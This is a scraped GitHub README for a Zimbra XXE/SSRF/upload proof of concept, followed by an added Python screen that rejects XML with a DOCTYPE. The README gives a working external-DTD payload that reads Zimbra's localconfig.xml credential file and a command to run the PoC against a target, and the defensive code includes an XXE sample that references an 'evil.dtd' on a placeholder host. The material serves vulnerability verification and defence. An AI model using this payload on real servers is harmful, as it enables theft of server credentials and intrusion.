fnmsd/zimbra_poc: Zimbra XXE+SSRF+UPLOAD Poc
2019-04-11 01:39:41 Author: github.com (view original) Views: 506


Zimbra XXE+SSRF+UPLOAD Poc


Latest commit bd3f4ab Mar 27, 2019

Files:
  README.md   first commit   Mar 27, 2019
  zimbra.py   first commit   Mar 27, 2019

README.md

Usage

  1. Edit dtd_url in the source code so that it points to the URL of a DTD with the following content:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
  2. Run:
python zimbra_poc.py https://target.com
  3. This PoC is for vulnerability verification only; do not use it for illegal purposes.
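The DTD above is the classic parameter-entity chain: `%file;` reads a local file, `%start;`/`%end;` wrap it in CDATA so it survives re-parsing, and `%all;` defines a general entity `fileContents` that the application later expands. The mitigation that removes this whole class of input is to refuse any DOCTYPE before the document reaches an application parser (in Java/Xerces this is the `disallow-doctype-decl` feature; Zimbra itself is Java). The following is an added example, not code from the zimbra_poc repository: a Python stdlib screen that aborts on the first DOCTYPE or entity declaration and only then hands the document to ElementTree. The function names, the `dtd-host.example` URL and the sample documents are constructed for illustration.

```python
"""Pre-parse DTD screen: refuse any XML that declares a DOCTYPE or entity.

Added example (not part of fnmsd/zimbra_poc). Expat is used purely as an
observer: it never fetches external resources on its own, so nothing the
DOCTYPE points at is retrieved while we inspect the declarations.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """The document declares a DTD (internal subset, external subset or entity)."""


def assert_no_dtd(data: bytes) -> None:
    """Scan the document with expat and abort on the first DTD construct."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires for both '<!DOCTYPE x [...]>' and '<!DOCTYPE x SYSTEM "...">'.
        raise DoctypeRejected(
            f"DOCTYPE {name!r} declared (system id {sysid!r}); DTDs are not accepted"
        )

    def on_entity(name, is_parameter, value, base, sysid, pubid, notation):
        # Defence in depth: reached only if the DOCTYPE handler were ever unset.
        kind = "parameter" if is_parameter else "general"
        raise DoctypeRejected(f"{kind} entity {name!r} declared; DTDs are not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)  # exceptions raised in handlers propagate from here


def has_dtd(data: bytes) -> bool:
    """True if the document would be rejected by assert_no_dtd."""
    try:
        assert_no_dtd(data)
    except DoctypeRejected:
        return True
    return False


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse request XML only after the DTD screen has passed."""
    assert_no_dtd(data)
    return ET.fromstring(data)


# Constructed sample inputs (hostname and element names are placeholders, not
# taken from the repository). The first has the shape the README relies on: an
# external parameter entity pulls in a DTD that defines &fileContents;.
XXE_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://dtd-host.example/evil.dtd">
  %dtd;
]>
<root><value>&fileContents;</value></root>"""

CLEAN_SAMPLE = b"""<?xml version="1.0"?>
<root><value>ordinary request body</value></root>"""


if __name__ == "__main__":
    print("XXE sample has DTD:", has_dtd(XXE_SAMPLE))      # True
    print("clean sample has DTD:", has_dtd(CLEAN_SAMPLE))  # False
    print("clean parse:", parse_untrusted(CLEAN_SAMPLE).find("value").text)
```

Rejecting DOCTYPE wholesale is stricter than disabling external entities alone, but it is the simplest policy to audit: a request that legitimately needs a DTD is rare in SOAP/REST traffic, and a log line from `DoctypeRejected` is itself a useful detection signal for XXE probing. Note that a malformed document still raises `xml.parsers.expat.ExpatError`, which callers should treat as a rejection too.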

References

  1. "A Saga of Code Executions on Zimbra"
  2. What Are XML External Entity (XXE) Attacks
  3. Vulnerability alert | Zimbra remote code execution vulnerability
  4. CVE-2013-7091 EXP
  5. Zimbra Soap API
  6. "A Saga of Code Executions on Zimbra": RCE vulnerability analysis and reproduction walkthrough


Source: https://github.com/fnmsd/zimbra_poc